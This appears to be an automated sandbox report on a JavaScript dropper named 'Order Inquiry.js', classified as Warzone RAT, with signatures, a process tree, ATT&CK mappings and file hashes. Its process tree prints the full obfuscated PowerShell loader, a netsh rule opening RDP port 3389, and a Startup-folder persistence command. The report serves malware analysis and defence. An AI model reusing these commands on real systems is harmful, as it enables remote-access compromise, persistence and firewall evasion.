Overview

overview

10

Static

static

Order Inquiry.js

windows7-x64

10

Order Inquiry.js

windows10-2004-x64

8

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    05-12-2022 06:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Order Inquiry.js

  • Size

    1KB

  • MD5

    f384eeb88cfc352b593f2ad0327fc8e5

  • SHA1

    e6aefd80a85dde5d4d55189a2f1136d452b64a37

  • SHA256

    1e1d7df8408886f486df3e57ee5b292d98329d351f9ddbe17b013a2aa37a5afd

  • SHA512

    389847737982847e472f17fb6333f5559e39c63640eee1faa1922de73ac2f4c08e4b0afb94a417688194dc4451855df729a572059048a246eb8aabd4db0a1090

Score
10/10
warzoneratevasioninfostealerpersistenceratupx

Malware Config

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Warzone RAT payload 8 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
    persistence
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order Inquiry.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51155111,51151111,51115111,51115551,51151115,51155511,51151111,55151115,51155511,51151111,51151151,55151111,51151511,51155551,51115511,55151111,51151555,51115555,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
        • Sets DLL path for service in the registry
        • Loads dropped DLL
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Users\Admin\AppData\Local\Temp\30.exe
          "C:\Users\Admin\AppData\Local\Temp\30.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:288
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=3389
            5⤵
            • Modifies Windows Firewall
            PID:2028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\Order Inquiry.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      PID:956
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:108
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:108 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1588

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

2
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\30.exe
    Filesize

    70KB

    MD5

    ca96229390a0e6a53e8f2125f2c01114

    SHA1

    a54b1081cf58724f8cb292b4d165dfee2fb1c9f6

    SHA256

    0df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c

    SHA512

    e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FZF73CTJ.txt
    Filesize

    601B

    MD5

    29c2937bdc8ab272b6e01566bd4ad2d3

    SHA1

    e0fc432bcf170985f3ee88e56fd68b78f2070fd2

    SHA256

    386ae2b1fc8094b8b756d84cdf969b2dec94ebbefdbff38403e020aac80c5e1e

    SHA512

    ee55b24a2f079a7accdb6011c2962e24a4869abf2927106a76b55b73f7f0f359709adeafb1c47a92fa318f1ac6ad5c14fbd02fa2b79c51bcf295f6d4d9dbf0da

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    5a9ba9ab025fabb6b1b3f1d7855b5cf2

    SHA1

    19b69af42dc257a5615aec91c38fc5a3dde07c58

    SHA256

    1415130f91f2147b3b8ac572b287e867149260237e70b16101de77fb8ef083ff

    SHA512

    9d52b88b76793e3bbcb244391d52335ccc43d18f50076ec40eb374eb5a19fbb349f737fd2714f7ee8a058eec5eee6b352297f223b572a419e8d4c4b465fff1f4

    Download Submit
  • \Program Files\Microsoft DN1\sqlmap.dll
    Filesize

    114KB

    MD5

    461ade40b800ae80a40985594e1ac236

    SHA1

    b3892eef846c044a2b0785d54a432b3e93a968c8

    SHA256

    798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

    SHA512

    421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

    Download Submit
  • \Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll
    Filesize

    75KB

    MD5

    42b2c266e49a3acd346b91e3b0e638c0

    SHA1

    2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

    SHA256

    adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

    SHA512

    770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

    Download Submit
  • \Users\Admin\AppData\Local\Temp\30.exe
    Filesize

    70KB

    MD5

    ca96229390a0e6a53e8f2125f2c01114

    SHA1

    a54b1081cf58724f8cb292b4d165dfee2fb1c9f6

    SHA256

    0df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c

    SHA512

    e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef

    Download Submit
  • \Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll
    Filesize

    75KB

    MD5

    42b2c266e49a3acd346b91e3b0e638c0

    SHA1

    2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

    SHA256

    adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

    SHA512

    770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

    Download Submit
  • memory/288-97-0x0000000000000000-mapping.dmp
    Download
  • memory/288-101-0x0000000001210000-0x000000000123D000-memory.dmp
    Filesize

    180KB

    Download
  • memory/288-105-0x0000000001210000-0x000000000123D000-memory.dmp
    Filesize

    180KB

    Download
  • memory/956-62-0x000007FEF3560000-0x000007FEF3F83000-memory.dmp
    Filesize

    10.1MB

    Download
  • memory/956-69-0x00000000024FB000-0x000000000251A000-memory.dmp
    Filesize

    124KB

    Download
  • memory/956-68-0x00000000024F4000-0x00000000024F7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/956-67-0x000000001B760000-0x000000001BA5F000-memory.dmp
    Filesize

    3.0MB

    Download
  • memory/956-58-0x0000000000000000-mapping.dmp
    Download
  • memory/956-63-0x000007FEF2A00000-0x000007FEF355D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/956-66-0x00000000024F4000-0x00000000024F7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1380-54-0x0000000001B50000-0x0000000001B60000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1380-55-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1556-71-0x00000000025A4000-0x00000000025A7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1556-65-0x00000000025A4000-0x00000000025A7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1556-90-0x00000000025A4000-0x00000000025A7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1556-60-0x000007FEF3560000-0x000007FEF3F83000-memory.dmp
    Filesize

    10.1MB

    Download
  • memory/1556-64-0x000007FEF2A00000-0x000007FEF355D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/1556-56-0x0000000000000000-mapping.dmp
    Download
  • memory/1556-70-0x00000000025AB000-0x00000000025CA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1556-91-0x00000000025AB000-0x00000000025CA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1612-78-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-85-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-87-0x000000000040B556-mapping.dmp
    Download
  • memory/1612-92-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-93-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-86-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-95-0x00000000053B0000-0x00000000054B0000-memory.dmp
    Filesize

    1024KB

    Download
  • memory/1612-89-0x00000000750A1000-0x00000000750A3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1612-83-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-81-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-75-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-100-0x0000000004E70000-0x0000000004E9D000-memory.dmp
    Filesize

    180KB

    Download
  • memory/1612-80-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-76-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize

    1.4MB

    Download
  • memory/1612-104-0x0000000004E70000-0x0000000004E9D000-memory.dmp
    Filesize

    180KB

    Download
  • memory/2028-99-0x0000000000000000-mapping.dmp
    Download